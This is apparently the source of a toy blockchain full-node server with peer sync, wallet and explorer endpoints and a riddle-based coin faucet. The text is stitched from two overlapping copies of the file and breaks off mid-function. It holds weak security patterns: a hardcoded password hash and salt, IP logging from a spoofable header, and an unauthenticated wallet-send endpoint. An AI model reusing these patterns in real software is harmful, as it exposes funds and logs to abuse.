requests.post(get_peer_url(max_peer) + "/getblockhashes", data={"myheight": fork_height}) hash_list = json.loads(decompress(r.text.encode())) for hhash in hash_list: block = receive_block_from_peer(max_peer, hhash) if not BLOCKCHAIN.add_block(block): logger.error("Sync: Block received is invalid, Cannot Sync") break return # Periodically sync with all the peers def sync_with_peers(): try: PEER_LIST = fetch_peer_list() new_peer_list = [] for peer in PEER_LIST: if greet_peer(peer): new_peer_list.append(peer) PEER_LIST = new_peer_list if PEER_LIST: max_peer = max(PEER_LIST, key=lambda k: k["blockheight"]) logger.debug(f"Sync: Syncing with {get_peer_url(max_peer)}, he seems to have height {max_peer["blockheight"]}") sync(max_peer) except Exception as e: logger.error("Sync: Error: " + str(e)) Timer(consts.MINING_INTERVAL_THRESHOLD * 2, sync_with_peers).start() def check_balance(pub_key: str) -> int: current_balance = 0 for x, utxo_list in BLOCKCHAIN.active_chain.utxo.utxo.items(): tx_out = utxo_list[0] if tx_out.address == pub_key: current_balance += int(tx_out.amount) return int(current_balance) def send_bounty(receiver_public_keys: List[str], amounts: List[int]): current_balance = check_balance(MY_WALLET.public_key) for key in receiver_public_keys: if len(key) < consts.PUBLIC_KEY_LENGTH: logger.debug("Invalid Public Key Length") return False total_amount = sum(amounts) if current_balance < total_amount: logger.debug("Insuficient balance") elif MY_WALLET.public_key in receiver_public_keys: logger.debug("Cannot send to myself") else: transaction = create_transaction(receiver_public_keys, amounts, MY_WALLET.public_key, message="Authority: Faucet Money") transaction.sign(MY_WALLET) logger.info("Wallet: Attempting to Send Transaction") try: r = requests.post( "http://0.0.0.0:" + str(consts.MINER_SERVER_PORT) + "/newtransaction", data=compress(transaction.to_json()), timeout=(5, 1), ) if r.status_code == 400: logger.info("Wallet: Could not Send Transaction. Invalid Transaction") else: logger.info("Wallet: Transaction Sent, Wait for it to be Mined") return True except Exception as e: logger.error("Wallet: Could not Send Transaction. Try Again." + str(e)) return False def create_transaction(receiver_public_keys: List[str], amounts: List[int], sender_public_key, message="") -> Transaction: vout = {} vin = {} current_amount = 0 total_amount = sum(amounts) i = 0 for so, utxo_list in BLOCKCHAIN.active_chain.utxo.utxo.items(): tx_out = utxo_list[0] if current_amount >= total_amount: break if tx_out.address == sender_public_key: current_amount += tx_out.amount vin[i] = TxIn(payout=SingleOutput.from_json(so), pub_key=sender_public_key, sig="") i += 1 for i, address in enumerate(receiver_public_keys): vout[i] = TxOut(amount=amounts[i], address=address) change = (current_amount - total_amount) if change > 0: vout[i + 1] = TxOut(amount=change, address=sender_public_key) tx = Transaction(version=consts.MINER_VERSION, locktime=0, timestamp=int(time.time()), vin=vin, vout=vout, message=message) return tx def get_ip(request): return request.environ.get("HTTP_X_FORWARDED_FOR") or request.environ.get("REMOTE_ADDR") def log_ip(request, fname): client_ip = get_ip(request) iplogger.info(f"{client_ip} : Called function {fname}") @app.post("/checkBalance") def checkingbalance(): log_ip(request, inspect.stack()[0][3]) data = request.json public_key = data["public_key"] logger.debug(public_key) current_balance = check_balance(public_key) return str(current_balance) @app.post("/makeTransaction") def make_transaction(): log_ip(request, inspect.stack()[0][3]) data = request.json bounty = int(data["bounty"]) receiver_public_key = data["receiver_public_key"] sender_public_key = data["sender_public_key"] message = "No Message" if "message" in data: message = data["message"] if len(receiver_public_key) < consts.PUBLIC_KEY_LENGTH: logger.debug("Invalid Receiver Public Key") response.status = 400 return "Invalid Receiver Public Key" current_balance = check_balance(sender_public_key) if current_balance < bounty: logger.debug("Insufficient Balance to make Transaction") response.status = 400 return "Insufficient Balance to make Transaction, need more " + str(bounty - current_balance) elif sender_public_key == receiver_public_key: logger.debug("Someone trying to send money to himself") response.status = 400 return "Cannot send money to youself" else: transaction = create_transaction([receiver_public_key], [bounty], sender_public_key, message=message) data = {} data["send_this"] = transaction.to_json() transaction.vin = {} data["sign_this"] = transaction.to_json() return json.dumps(data) @app.post("/sendTransaction") def send_transaction(): log_ip(request, inspect.stack()[0][3]) data = request.json transaction = Transaction.from_json(data["transaction"]).object() sig = data["signature"] transaction.add_sign(sig) logger.debug(transaction) logger.info("Wallet: Attempting to Send Transaction") try: r = requests.post( "http://0.0.0.0:" + str(consts.MINER_SERVER_PORT) + "/newtransaction", data=compress(transaction.to_json()), timeout=(5, 1), ) if r.status_code == 400: response.status = 400 logger.error("Wallet: Could not Send Transaction. Invalid transaction") return "Try Again" except Exception as e: response.status = 400 logger.error("Wallet: Could not Send Transaction. Try Again." + str(e)) return "Try Again" else: logger.info("Wallet: Transaction Sent, Wait for it to be Mined") return "Done" @app.post("/transactionHistory") def transaction_history(): log_ip(request, inspect.stack()[0][3]) data = request.json public_key = data["public_key"] tx_hist = BLOCKCHAIN.active_chain.transaction_history.get(public_key) return json.dumps(tx_hist) @app.post("/greetpeer") def greet_peer_f(): log_ip(request, inspect.stack()[0][3]) try: peer = {} peer["port"] = request.forms.get("port") peer["ip"] = request.remote_addr peer["time"] = time.time() peer["version"] = request.forms.get("version") peer["blockheight"] = request.forms.get("blockheight") ADD_ENTRY = True for entry in PEER_LIST: ip = entry["ip"] port = entry["port"] if ip == peer["ip"] and port == peer["port"]: ADD_ENTRY = False if ADD_ENTRY: PEER_LIST.append(peer) logger.debug("Server: Greet, A new peer joined, Adding to List") except Exception as e: logger.debug("Server: Greet Error: " + str(e)) pass data = {"version": consts.MINER_VERSION, "blockheight": BLOCKCHAIN.active_chain.length} response.content_type = "application/json" return json.dumps(data) @lru_cache(maxsize=128) def cached_get_block(headerhash: str) -> str: if headerhash: db_block = get_block_from_db(headerhash) if db_block: return compress(db_block) else: logger.error("ERROR CALLED GETBLOCK FOR NON EXISTENT BLOCK") return "Invalid Hash" @app.post("/getblock") def getblock(): log_ip(request, inspect.stack()[0][3]) hhash = request.forms.get("headerhash") return cached_get_block(hhash) @app.post("/checkblock") def checkblock(): log_ip(request, inspect.stack()[0][3]) headerhash = request.forms.get("headerhash") if get_block_from_db(headerhash): return json.dumps(True) return json.dumps(False) @app.post("/getblockhashes") def send_block_hashes(): log_ip(request, inspect.stack()[0][3]) peer_height = int(request.forms.get("myheight")) hash_list = [] for i in range(peer_height, BLOCKCHAIN.active_chain.length): hash_list.append(dhash(BLOCKCHAIN.active_chain.header_list[i])) return compress(json.dumps(hash_list)).decode() @lru_cache(maxsize=16) def process_new_block(request_data: bytes) -> str: global BLOCKCHAIN block_json = decompress(request_data) if block_json: try: block = Block.from_json(block_json).object() # Check if block already exists if get_block_from_db(dhash(block.header)): logger.info("Server: Received block exists, doing nothing") return "Block already Received Before" if BLOCKCHAIN.add_block(block): logger.info("Server: Received a New Valid Block, Adding to Chain") logger.debug("Server: Sending new block to peers") # Broadcast block to other peers send_to_all_peers("/newblock", request_data) # TODO Make new chain/ orphan set for Block that is not added except Exception as e: logger.error("Server: New Block: invalid block received " + str(e)) return "Invalid Block Received" # Kill Miner t = Timer(1, miner.stop_mining) t.start() return "Block Received" logger.error("Server: Invalid Block Received") return "Invalid Block" @app.post("/newblock") def received_new_block(): log_ip(request, inspect.stack()[0][3]) return process_new_block(request.body.read()) @lru_cache(maxsize=16) def process_new_transaction(request_data: bytes) -> str: global BLOCKCHAIN transaction_json = decompress(request_data) if transaction_json: try: tx = Transaction.from_json(transaction_json).object() # Add transaction to Mempool if tx not in BLOCKCHAIN.mempool: if BLOCKCHAIN.active_chain.is_transaction_valid(tx): logger.debug("Valid Transaction received, Adding to Mempool") BLOCKCHAIN.mempool.add(tx) # Broadcast block to other peers send_to_all_peers("/newtransaction", request_data) else: logger.debug("The transation is not valid, not added to Mempool") return False, "Not Valid Transaction" else: return True, "Transaction Already received" except Exception as e: logger.error("Server: New Transaction: Invalid tx received: " + str(e)) return False, "Not Valid Transaction" return True, "Done" # Transactions for all active chains @app.post("/newtransaction") def received_new_transaction(): log_ip(request, inspect.stack()[0][3]) result, message = process_new_transaction(request.body.read()) if result: response.status = 200 else: response.status = 400 return message question = '''What is greater than God, more evil than the devil, the poor have it, the rich need it, and if you eat it, you'll die?''' actual_answer = "nothing" @app.get("/") def home(): log_ip(request, inspect.stack()[0][3]) message = "" message_type = "info" return template("index.html", message=message, message_type=message_type, question=question) with open('uuids.json', 'r') as file: uuid_json = file.read() valid_ids = set(json.loads(uuid_json)) @app.post("/") def puzzle(): log_ip(request, inspect.stack()[0][3]) message = "" message_type = "info" uuid = request.forms.get("uuid") pubkey = request.forms.get("pubkey") amounts = [300] if uuid in valid_ids: logger.debug("Valid Answer, Rewarding " + pubkey) message = "Well Done!" if check_balance(MY_WALLET.public_key) >= sum(amounts): result = send_bounty([pubkey], amounts) if result: message = "Your reward is being sent, please wait for it to be mined!" valid_ids.remove(uuid) else: message = "Some Error Occured, Contact Admin." message_type = "warning" else: message = "Invalid Unique ID!" message_type = "danger" return template("index.html", message=message, message_type=message_type, question=question) @app.get('/about') def about(): return template("about.html") @app.get("/wallet") def wallet(): log_ip(request, inspect.stack()[0][3]) return template("wallet.html", message="", message_type="", pubkey=MY_WALLET.public_key) @app.post("/wallet") def wallet_post(): log_ip(request, inspect.stack()[0][3]) number = int(request.forms.get("number")) message = "" message_type = "info" try: receivers = [] amounts = [] total_amount = 0 for i in range(0, number): receiver = str(request.forms.get("port" + str(i))) bounty = int(request.forms.get("amount" + str(i))) publickey = "" if len(receiver) < 10: wallet = get_wallet_from_db(receiver) if wallet is not None: publickey = wallet[1] else: message = "Error with the Receiver Port ID, try again." message_type = "danger" return template("wallet.html", message=message, message_type=message_type, pubkey=MY_WALLET.public_key) else: publickey = receiver total_amount += bounty receivers.append(publickey) amounts.append(bounty) if check_balance(MY_WALLET.public_key) >= total_amount: result = send_bounty(receivers, amounts) if result: message = "Your transaction is sent, please wait for it to be mined!" else: message = "Some Error Occured, Contact Admin." message_type = "warning" else: message = "You have Insufficient Balance!" message_type = "warning" return template("wallet.html", message=message, message_type=message_type, pubkey=MY_WALLET.public_key) except Exception as e: logger.error(e) message = "Some Error Occured. Please try again later." message_type = "danger" return template("wallet.html", message=message, message_type=message_type, pubkey=MY_WALLET.public_key) @app.get("/checkmybalance") def checkblance(): log_ip(request, inspect.stack()[0][3]) return str(check_balance(MY_WALLET.public_key)) @app.route("/static/<filename:path>", name="static") def serve_static(filename): log_ip(request, inspect.stack()[0][3]) return static_file(filename, root="static") @app.get("/favicon.ico") def get_favicon(): log_ip(request, inspect.stack()[0][3]) return static_file("favicon.ico", root="static") @app.get("/info") def sendinfo(): log_ip(request, inspect.stack()[0][3]) s = ( "No. of Blocks: " + str(BLOCKCHAIN.active_chain.length) + "<br>" + dhash(BLOCKCHAIN.active_chain.header_list[-1]) + "<br>" + "Balance " + str(check_balance(MY_WALLET.public_key)) + "<br>Public Key: <br>" + str(get_wallet_from_db(consts.MINER_SERVER_PORT)[1]) ) return s def render_block_header(hdr): html = "<table>" html += "<tr><th>" + "Height" + "</th>" html += "<td>" + str(hdr.height) + "</td></tr>" html += "<tr><th>" + "Block Hash" + "</th>" html += "<td>" + dhash(hdr) + "</td></tr>" html += "<tr><th>" + "Prev Block Hash" + "</th>" html += "<td>" + str(hdr.prev_block_hash) + "</td></tr>" html += "<tr><th>" + "Merkle Root" + "</th>" html += "<td>" + str(hdr.merkle_root) + "</td></tr>" html += "<tr><th>" + "Timestamp" + "</th>" html += ( "<td>" + str(datetime.fromtimestamp(hdr.timestamp).strftime("%d-%m-%Y %H:%M:%S")) + " (" + str(hdr.timestamp) + ")</td></tr>" ) # get block block = Block.from_json(get_block_from_db(dhash(hdr))).object() html += "<tr><th>" + "Transactions" + "</th>" html += "<td>" + str(len(block.transactions)) + "</td></tr>" # for i, transaction in enumerate(block.transactions): # s = "coinbase: " + str(transaction.is_coinbase) + ", fees: " + str(transaction.fees) # html += "<tr><th>Transaction " + str(i) + "</th><td>" + str(s) + "</td></tr>" html += "</table>" return str(html) @app.get("/chains") def visualize_chain(): log_ip(request, inspect.stack()[0][3]) data = [] start = BLOCKCHAIN.active_chain.length - 10 if BLOCKCHAIN.active_chain.length > 10 else 0 headers = [] hdr_list = BLOCKCHAIN.active_chain.header_list if len(hdr_list) > 200: hdr_list = BLOCKCHAIN.active_chain.header_list[:100] + BLOCKCHAIN.active_chain.header_list[-100:] for hdr in hdr_list: d = {} d["hash"] = dhash(hdr)[-5:] d["time"] = hdr.timestamp d["data"] = render_block_header(hdr) headers.append(d) data.append(headers) return template("chains.html", data=data, start=start) @app.get("/explorer") def explorer(): log_ip(request, inspect.stack()[0][3]) prev = int(request.query.prev or 0) if prev < 0: prev = 0 hdr_list = list(reversed(BLOCKCHAIN.active_chain.header_list)) indexes = [i for i in range(prev * 8, (prev + 1) * 8) if i < len(hdr_list)] blocks = [Block.from_json(get_block_from_db(dhash(hdr_list[i]))).object() for i in indexes] transactions = list(BLOCKCHAIN.mempool) return template("explorer.html", blocks=blocks, transactions=transactions, prev=prev) @app.route("/block/<blockhash>", name="transaction") def block(blockhash): log_ip(request, inspect.stack()[0][3]) try: block = Block.from_json(get_block_from_db(blockhash)).object() except Exception as e: logger.debug("BLOCK/blockhash: " + str(e)) return template("error.html") return template("block.html", block=block) @app.route("/transaction/<blockhash>/<txhash>", name="transaction") def transaction(blockhash, txhash): log_ip(request, inspect.stack()[0][3]) try: block = Block.from_json(get_block_from_db(blockhash)).object() tx = None for t in block.transactions: if t.hash() == txhash: tx = t except Exception as e: logger.debug("Transaction/bhash/tx: " + str(e)) return template("error.html") return template("transaction.html", tx=tx, block=block) @app.route("/address/<pubkey:re:.+>", name="account") def account(pubkey): log_ip(request, inspect.stack()[0][3]) balance = check_balance(pubkey) tx_hist = BLOCKCHAIN.active_chain.transaction_history.get(pubkey) return template("account.html", tx_hist=tx_hist, balance=balance, pubkey=pubkey) @app.post("/mining") def mining(): log_ip(request, inspect.stack()[0][3]) password = request.body.read().decode("utf-8") hashed = b"\x11`\x1e\xdd\xd1\xb6\x80\x0f\xd4\xb0t\x90\x9b\xd3]\xa0\xcc\x1d\x04$\x8b\xb1\x19J\xaa!T5-\x9eJ\xfcI5\xc0\xbb\xf5\xb1\x9d\xba\xbef@\xa1)\xcf\x9b]c(R\x91\x0e\x9dMM\xb6\x94\xa9\xe2\x94il\x15" dk = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), b"forgeteverythingthatyouthinkyouknow", 200000) if hashed == dk: consts.NO_MINING = not consts.NO_MINING logger.info("Mining: " + str(not consts.NO_MINING)) return "Mining Toggled, " + "NOT MINING" if consts.NO_MINING else "MINING" else: return "Password Mismatch," + "NOT MINING" if consts.NO_MINING else "MINING" @app.route("/<url:re:.+>") @error(403) @error(404) @error(505) def error_handle(url="url", error="404"): log_ip(request, inspect.stack()[0][3]) return template("error.html") if __name__ == "__main__": try: if consts.NEW_BLOCKCHAIN: logger.info("FullNode: Starting New Chain from Genesis") BLOCKCHAIN.add_block(genesis_block) else: # Restore Blockchain logger.info("FullNode: Restoring Existing Chain") header_list = read_header_list_from_db() BLOCKCHAIN.build_from_header_list(header_list) # Sync with all my peers sync_with_peers() # Start mining Thread Thread(target=start_mining_thread, daemon=True).start() if consts.NO_MINING: logger.info("FullNode: Not Mining") # Start server if LINE_PROFILING: from wsgi_lineprof.middleware import LineProfilerMiddleware with open("lineprof" + str(consts.MINER_SERVER_PORT) + ".log", "w") as f: app = LineProfilerMiddleware(app, stream=f, async_stream=True) waitress.serve(app, host="0.0.0.0", threads=16, port=consts.MINER_SERVER_PORT) else: waitress.serve(app, host="0.0.0.0", threads=16, port=consts.MINER_SERVER_PORT) except KeyboardInterrupt: miner.stop_mining()
import json import time from functools import lru_cache from multiprocessing import Pool, Process from threading import Thread, Timer from typing import Any, Dict, List from datetime import datetime import hashlib import inspect import requests import waitress from bottle import BaseTemplate, Bottle, request, response, static_file, template, error import utils.constants as consts from core import Block, BlockChain, SingleOutput, Transaction, TxIn, TxOut, genesis_block from authority import Authority from utils.logger import logger, iplogger from utils.storage import get_block_from_db, get_wallet_from_db, read_header_list_from_db from utils.utils import compress, decompress, dhash from wallet import Wallet app = Bottle() BaseTemplate.defaults["get_url"] = app.get_url LINE_PROFILING = False BLOCKCHAIN = BlockChain() PEER_LIST: List[Dict[str, Any]] = [] MY_WALLET = Wallet() miner = Authority() def mining_thread_task(): while True: if not miner.is_mining() and not consts.NO_MINING: try: miner.start_mining(BLOCKCHAIN.mempool, BLOCKCHAIN.active_chain, MY_WALLET) except Exception as e: miner.stop_mining() logger.debug("Miner: Error while mining:" + str(e)) time.sleep(consts.MINING_INTERVAL_THRESHOLD // 2) def send_to_all_peers(url, data): def request_task(peers, url, data): for peer in peers: try: requests.post(get_peer_url(peer) + url, data=data, timeout=(5, 1)) except Exception as e: logger.debug("Server: Requests: Error while sending data in process" + str(peer)) Process(target=request_task, args=(PEER_LIST, url, data), daemon=True).start() def start_mining_thread(): time.sleep(5) Thread(target=mining_thread_task, name="Miner", daemon=True).start() def fetch_peer_list() -> List[Dict[str, Any]]: try: r = requests.post(consts.SEED_SERVER_URL, data={"port": consts.MINER_SERVER_PORT}) peer_list = json.loads(r.text) return peer_list except Exception as e: logger.error("Could not connect to DNS Seed") return [] def get_peer_url(peer: Dict[str, Any]) -> str: return "http://" + str(peer["ip"]) + ":" + str(peer["port"]) def greet_peer(peer: Dict[str, Any]) -> bool: try: url = get_peer_url(peer) data = {"port": consts.MINER_SERVER_PORT, "version": consts.MINER_VERSION, "blockheight": BLOCKCHAIN.active_chain.length} # Send a POST request to the peer r = requests.post(url + "/greetpeer", data=data) data = json.loads(r.text) # Update the peer data in the peer list with the new data received from the peer. if data.get("blockheight", None): peer.update(data) else: logger.debug("Main: Peer data does not have Block Height") return False return True except Exception as e: logger.debug("Main: Could not greet peer" + str(e)) return False def receive_block_from_peer(peer: Dict[str, Any], header_hash) -> Block: r = requests.post(get_peer_url(peer) + "/getblock", data={"headerhash": header_hash}) return Block.from_json(decompress(r.text)).object() def check_block_with_peer(peer, hhash): r = requests.post(get_peer_url(peer) + "/checkblock", data={"headerhash": hhash}) result = json.loads(r.text) if result: return True return False def get_block_header_hash(height): return dhash(BLOCKCHAIN.active_chain.header_list[height]) def sync(max_peer): fork_height = BLOCKCHAIN.active_chain.length r = requests.post(get_peer_url(max_peer) + "/getblockhashes", data={"myheight": fork_height}) hash_list = json.loads(decompress(r.text.encode())) for hhash in hash_list: block = receive_block_from_peer(max_peer, hhash) if not BLOCKCHAIN.add_block(block): logger.error("Sync: Block received is invalid, Cannot Sync") break return # Periodically sync with all the peers def sync_with_peers(): try: PEER_LIST = fetch_peer_list() new_peer_list = [] for peer in PEER_LIST: if greet_peer(peer): new_peer_list.append(peer) PEER_LIST = new_peer_list if PEER_LIST: max_peer = max(PEER_LIST, key=lambda k: k["blockheight"]) logger.debug(f"Sync: Syncing with {get_peer_url(max_peer)}, he seems to have height {max_peer['blockheight']}") sync(max_peer) except Exception as e: logger.error("Sync: Error: " + str(e)) Timer(consts.MINING_INTERVAL_THRESHOLD * 2, sync_with_peers).start() def check_balance(pub_key: str) -> int: current_balance = 0 for x, utxo_list in BLOCKCHAIN.active_chain.utxo.utxo.items(): tx_out = utxo_list[0] if tx_out.address == pub_key: current_balance += int(tx_out.amount) return int(current_balance) def send_bounty(receiver_public_keys: List[str], amounts: List[int]): current_balance = check_balance(MY_WALLET.public_key) for key in receiver_public_keys: if len(key) < consts.PUBLIC_KEY_LENGTH: logger.debug("Invalid Public Key Length") return False total_amount = sum(amounts) if current_balance < total_amount: logger.debug("Insuficient balance") elif MY_WALLET.public_key in receiver_public_keys: logger.debug("Cannot send to myself") else: transaction = create_transaction(receiver_public_keys, amounts, MY_WALLET.public_key, message="Authority: Faucet Money") transaction.sign(MY_WALLET) logger.info("Wallet: Attempting to Send Transaction") try: r = requests.post( "http://0.0.0.0:" + str(consts.MINER_SERVER_PORT) + "/newtransaction", data=compress(transaction.to_json()), timeout=(5, 1), ) if r.status_code == 400: logger.info("Wallet: Could not Send Transaction. Invalid Transaction") else: logger.info("Wallet: Transaction Sent, Wait for it to be Mined") return True except Exception as e: logger.error("Wallet: Could not Send Transaction. Try Again." + str(e)) return False def create_transaction(receiver_public_keys: List[str], amounts: List[int], sender_public_key, message="") -> Transaction: vout = {} vin = {} current_amount = 0 total_amount = sum(amounts) i = 0 for so, utxo_list in BLOCKCHAIN.active_chain.utxo.utxo.items(): tx_out = utxo_list[0] if current_amount >= total_amount: break if tx_out.address == sender_public_key: current_amount += tx_out.amount vin[i] = TxIn(payout=SingleOutput.from_json(so), pub_key=sender_public_key, sig="") i += 1 for i, address in enumerate(receiver_public_keys): vout[i] = TxOut(amount=amounts[i], address=address) change = (current_amount - total_amount) if change > 0: vout[i + 1] = TxOut(amount=change, address=sender_public_key) tx = Transaction(version=consts.MINER_VERSION, locktime=0, timestamp=int(time.time()), vin=vin, vout=vout, message=message) return tx def get_ip(request): return request.environ.get("HTTP_X_FORWARDED_FOR") or request.environ.get("REMOTE_ADDR") def log_ip(request, fname): client_ip = get_ip(request) iplogger.info(f"{client_ip} : Called function {fname}") @app.post("/checkBalance") def checkingbalance(): log_ip(request, inspect.stack()[0][3]) data = request.json public_key = data["public_key"] logger.debug(public_key) current_balance = check_balance(public_key) return str(current_balance) @app.post("/makeTransaction") def make_transaction(): log_ip(request, inspect.stack()[0][3]) data = request.json bounty = int(data["bounty"]) receiver_public_key = data["receiver_public_key"] sender_public_key = data["sender_public_key"] message = "No Message" if "message" in data: message = data["message"] if len(receiver_public_key) < consts.PUBLIC_KEY_LENGTH: logger.debug("Invalid Receiver Public Key") response.status = 400 return "Invalid Receiver Public Key" current_balance = check_balance(sender_public_key) if current_balance < bounty: logger.debug("Insufficient Balance to make Transaction") response.status = 400 return "Insufficient Balance to make Transaction, need more " + str(bounty - current_balance) elif sender_public_key == receiver_public_key: logger.debug("Someone trying to send money to himself") response.status = 400 return "Cannot send money to youself" else: transaction = create_transaction([receiver_public_key], [bounty], sender_public_key, message=message) data = {} data["send_this"] = transaction.to_json() transaction.vin = {} data["sign_this"] = transaction.to_json() return json.dumps(data) @app.post("/sendTransaction") def send_transaction(): log_ip(request, inspect.stack()[0][3]) data = request.json transaction = Transaction.from_json(data["transaction"]).object() sig = data["signature"] transaction.add_sign(sig) logger.debug(transaction) logger.info("Wallet: Attempting to Send Transaction") try: r = requests.post( "http://0.0.0.0:" + str(consts.MINER_SERVER_PORT) + "/newtransaction", data=compress(transaction.to_json()), timeout=(5, 1), ) if r.status_code == 400: response.status = 400 logger.error("Wallet: Could not Send Transaction. Invalid transaction") return "Try Again" except Exception as e: response.status = 400 logger.error("Wallet: Could not Send Transaction. Try Again." + str(e)) return "Try Again" else: logger.info("Wallet: Transaction Sent, Wait for it to be Mined") return "Done" @app.post("/transactionHistory") def transaction_history(): log_ip(request, inspect.stack()[0][3]) data = request.json public_key = data["public_key"] tx_hist = BLOCKCHAIN.active_chain.transaction_history.get(public_key) return json.dumps(tx_hist) @app.post("/greetpeer") def greet_peer_f(): log_ip(request, inspect.stack()[0][3]) try: peer = {} peer["port"] = request.forms.get("port") peer["ip"] = request.remote_addr peer["time"] = time.time() peer["version"] = request.forms.get("version") peer["blockheight"] = request.forms.get("blockheight") ADD_ENTRY = True for entry in PEER_LIST: ip = entry["ip"] port = entry["port"] if ip == peer["ip"] and port == peer["port"]: ADD_ENTRY = False if ADD_ENTRY: PEER_LIST.append(peer) logger.debug("Server: Greet, A new peer joined, Adding to List") except Exception as e: logger.debug("Server: Greet Error: " + str(e)) pass data = {"version": consts.MINER_VERSION, "blockheight": BLOCKCHAIN.active_chain.length} response.content_type = "application/json" return json.dumps(data) @lru_cache(maxsize=128) def cached_get_block(headerhash: str) -> str: if headerhash: db_block = get_block_from_db(headerhash) if db_block: return compress(db_block) else: logger.error("ERROR CALLED GETBLOCK FOR NON EXISTENT BLOCK") return "Invalid Hash" @app.post("/getblock") def getblock(): log_ip(request, inspect.stack()[0][3]) hhash = request.forms.get("headerhash") return cached_get_block(hhash) @app.post("/checkblock") def checkblock(): log_ip(request, inspect.stack()[0][3]) headerhash = request.forms.get("headerhash") if get_block_from_db(headerhash): return json.dumps(True) return json.dumps(False) @app.post("/getblockhashes") def send_block_hashes(): log_ip(request, inspect.stack()[0][3]) peer_height = int(request.forms.get("myheight")) hash_list = [] for i in range(peer_height, BLOCKCHAIN.active_chain.length): hash_list.append(dhash(BLOCKCHAIN.active_chain.header_list[i])) return compress(json.dumps(hash_list)).decode() @lru_cache(maxsize=16) def process_new_block(request_data: bytes) -> str: global BLOCKCHAIN block_json = decompress(request_data) if block_json: try: block = Block.from_json(block_json).object() # Check if block already exists if get_block_from_db(dhash(block.header)): logger.info("Server: Received block exists, doing nothing") return "Block already Received Before" if BLOCKCHAIN.add_block(block): logger.info("Server: Received a New Valid Block, Adding to Chain") logger.debug("Server: Sending new block to peers") # Broadcast block to other peers send_to_all_peers("/newblock", request_data) # TODO Make new chain/ orphan set for Block that is not added except Exception as e: logger.error("Server: New Block: invalid block received " + str(e)) return "Invalid Block Received" # Kill Miner t = Timer(1, miner.stop_mining) t.start() return "Block Received" logger.error("Server: Invalid Block Received") return "Invalid Block" @app.post("/newblock") def received_new_block(): log_ip(request, inspect.stack()[0][3]) return process_new_block(request.body.read()) @lru_cache(maxsize=16) def process_new_transaction(request_data: bytes) -> str: global BLOCKCHAIN transaction_json = decompress(request_data) if transaction_json: try: tx = Transaction.from_json(transaction_json).object() # Add transaction to Mempool if tx not in BLOCKCHAIN.mempool: if BLOCKCHAIN.active_chain.is_transaction_valid(tx): logger.debug("Valid Transaction received, Adding to Mempool") BLOCKCHAIN.mempool.add(tx) # Broadcast block to other peers send_to_all_peers("/newtransaction", request_data) else: logger.debug("The transation is not valid, not added to Mempool") return False, "Not Valid Transaction" else: return True, "Transaction Already received" except Exception as e: logger.error("Server: New Transaction: Invalid tx received: " + str(e)) return False, "Not Valid Transaction" return True, "Done" # Transactions for all active chains @app.post("/newtransaction") def received_new_transaction(): log_ip(request, inspect.stack()[0][3]) result, message = process_new_transaction(request.body.read()) if result: response.status = 200 else: response.status = 400 return message question = '''What is greater than God, more evil than the devil, the poor have it, the rich need it, and if you eat it, you'll die?''' actual_answer = "nothing" @app.get("/") def home(): log_ip(request, inspect.stack()[0][3]) message = "" message_type = "info" return template("index.html", message=message, message_type=message_type, question=question) with open('uuids.json', 'r') as file: uuid_json = file.read() valid_ids = set(json.loads(uuid_json)) @app.post("/") def puzzle(): log_ip(request, inspect.stack()[0][3]) message = "" message_type = "info" uuid = request.forms.get("uuid") pubkey = request.forms.get("pubkey") amounts = [300] if uuid in valid_ids: logger.debug("Valid Answer, Rewarding " + pubkey) message = "Well Done!" if check_balance(MY_WALLET.public_key) >= sum(amounts): result = send_bounty([pubkey], amounts) if result: message = "Your reward is being sent, please wait for it to be mined!" valid_ids.remove(uuid) else: message = "Some Error Occured, Contact Admin." message_type = "warning" else: message = "Invalid Unique ID!" message_type = "danger" return template("index.html", message=message, message_type=message_type, question=question) @app.get('/about') def about(): return template("about.html") @app.get("/wallet") def wallet(): log_ip(request, inspect.stack()[0][3]) return template("wallet.html", message="", message_type="", pubkey=MY_WALLET.public_key) @app.post("/wallet") def wallet_post(): log_ip(request, inspect.stack()[0][3]) number = int(request.forms.get("number")) message = "" message_type = "info" try: receivers = [] amounts = [] total_amount = 0 for i in range(0, number): receiver = str(request.forms.get("port" + str(i))) bounty = int(request.forms.get("amount" + str(i))) publickey = "" if len(receiver) < 10: wallet = get_wallet_from_db(receiver) if wallet is not None: publickey = wallet[1] else: message = "Error with the Receiver Port ID, try again." message_type = "danger" return template("wallet.html", message=message, message_type=message_type, pubkey=MY_WALLET.public_key) else: publickey = receiver total_amount += bounty receivers.append(publickey) amounts.append(bounty) if check_balance(MY_WALLET.public_key) >= total_amount: result = send_bounty(receivers, amounts) if result: message = "Your transaction is sent, please wait for it to be mined!" else: message = "Some Error Occured, Contact Admin." message_type = "warning" else: message = "You have Insufficient Balance!" message_type = "warning" return template("wallet.html", message=message, message_type=message_type, pubkey=MY_WALLET.public_key) except Exception as e: logger.error(e) message = "Some Error Occured. Please try again later." message_type = "danger" return template("wallet.html", message=message, message_type=message_type, pubkey=MY_WALLET.public_key) @app.get("/checkmybalance") def checkblance(): log_ip(request, inspect.stack()[0][3]) return str(check_balance(MY_WALLET.public_key)) @app.route("/static/<filename:path>", name="static") def serve_static(filename): log_ip(request, inspect.stack()[0][3]) return static_file(filename, root="static") @app.get("/favicon.ico") def get_favicon(): log_ip(request, inspect.stack()[0][3]) return static_file("favicon.ico", root="static") @app.get("/info") def sendinfo(): log_ip(request, inspect.stack()[0][3]) s = ( "No. of Blocks: " + str(BLOCKCHAIN.active_chain.length) + "<br>" + dhash(BLOCKCHAIN.active_chain.header_list[-1]) + "<br>" + "Balance " + str(check_balance(MY_WALLET.public_key)) + "<br>Public Key: <br>" + str(get_wallet_from_db(consts.MINER_SERVER_PORT)[1]) ) return s def render_block_header(hdr): html = "<table>" html += "<tr><th>" + "Height" + "</th>" html += "<td>" + str(hdr.height) + "</td></tr>" html += "<tr><th>" + "Block Hash" + "</th>" html += "<td>" + dhash(hdr) + "</td></tr>" html += "<tr><th>" + "Prev Block Hash" + "</th>" html += "<td>" + str(hdr.prev_block_hash) + "</td></tr>" html += "<tr><th>" + "Merkle Root" + "</th>" html += "<td>" + str(hdr.merkle_root) + "</td></tr>" html += "<tr><th>" + "Timestamp" + "</th>" html += ( "<td>" + str(datetime.fromtimestamp(hdr.timestamp).strftime("%d-%m-%Y %H:%M:%S")) + " (" + str(hdr.timestamp) + ")</td></tr>" ) # get block block = Block.from_json(get_block_from_db(dhash(hdr))).object() html += "<tr><th>" + "Transactions" + "</th>" html += "<td>" + str(len(block.transactions)) + "</td></tr>" # for i, transaction in enumerate(block.transactions): # s = 